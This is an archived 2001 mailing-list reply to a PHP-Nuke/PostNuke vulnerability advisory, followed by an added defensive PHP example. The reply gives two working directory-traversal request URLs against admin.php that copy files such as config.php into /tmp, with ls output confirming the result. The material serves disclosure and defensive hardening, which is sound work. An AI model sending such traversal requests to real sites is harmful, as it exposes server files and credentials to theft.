Re: twlc advisory: all versions of php nuke are vulnerable...

From: Paul Starzetz (paulat_private)
Date: Tue Sep 25 2001 - 04:40:37 PDT


    supergateat_private wrote:
    
    > Summary
    > This time the bug is really dangerous...it allows you to 'cp' any file on
    > the box... or even upload files...
    
    and even copy outside the postnuke path:
    
    http://somehost/nukepath/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/../../../../../../../tmp/&userfile=config.php&userfile_name=hacked.txt
    
    or for example:
    
    http://somehost/nukepath/admin.php?upload=1&wdir=/../../../../../../../tmp&userfile=/../../../../../../../tmp/copyme.txt&userfile_name=/../../../../../../../tmp/hacked.txt
    
    root@somehost:/tmp > ls -la
    total 20
    drwxrwxrwt   8 root     root         2048 Sep 25 13:37 .
    drwxr-xr-x  19 root     root         2048 Feb 28  2001 ..
    drwxrwxrwt   2 root     root         2048 Mar  6  2001 .X11-unix
    -rw-r--r--   1 root     root          851 Sep 25 13:37 copyme.txt
    -rwxr-xr-x   1 wwwrun   wwwrun        851 Sep 25 13:37 hacked.txt
    ...
    
    Postnuke breaks with elementary secure coding practices...
    
    /ihq
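
For defenders, the checks whose absence makes the requests above work can be sketched as follows. This is an added example, not part of the original message and not PHP-Nuke or PostNuke code; `UPLOAD_ROOT`, `resolve_target()` and `store_upload()` are hypothetical names, and the upload root path is an assumption.

```php
<?php
// Added example (hypothetical names; not PHP-Nuke/PostNuke code).
const UPLOAD_ROOT = '/var/www/nuke/uploads'; // assumed upload directory

// Build the destination path from a requested sub-directory and file name,
// refusing anything that resolves outside $root.
function resolve_target(string $root, string $wdir, string $name): string
{
    $rootReal = realpath($root);
    if ($rootReal === false) {
        throw new RuntimeException('upload root does not exist');
    }
    // realpath() collapses "../" sequences and symlinks before the comparison.
    $dirReal = realpath($rootReal . DIRECTORY_SEPARATOR . $wdir);
    if ($dirReal === false || !is_dir($dirReal)) {
        throw new RuntimeException('target directory does not exist');
    }
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if ($dirReal !== $rootReal && strncmp($dirReal, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('target directory is outside the upload root');
    }
    // The file name may not carry path components: no separators, no leading dot.
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,100}$/', $name)) {
        throw new RuntimeException('file name not allowed');
    }
    return $dirReal . DIRECTORY_SEPARATOR . $name;
}

// $file is one entry of $_FILES. The source path is never read from a
// request parameter, so a "userfile=..." value in the query string is ignored.
function store_upload(array $file, string $wdir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'] ?? '')) {
        throw new RuntimeException('not a genuine HTTP upload');
    }
    $target = resolve_target(UPLOAD_ROOT, $wdir, (string)($file['name'] ?? ''));
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store upload');
    }
    chmod($target, 0644); // stored files do not need the execute bit
    return $target;
}

// Stand-alone use inside a request handler:
if (isset($_FILES['userfile'])) {
    echo store_upload($_FILES['userfile'], (string)($_POST['wdir'] ?? ''));
}
```

With these checks a `wdir` of `/../../../../../../../tmp/` resolves outside the upload root and is rejected, and a `userfile` path supplied as a request parameter never reaches the copy.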
    



    This archive was generated by hypermail 2b30 : Tue Sep 25 2001 - 10:27:00 PDT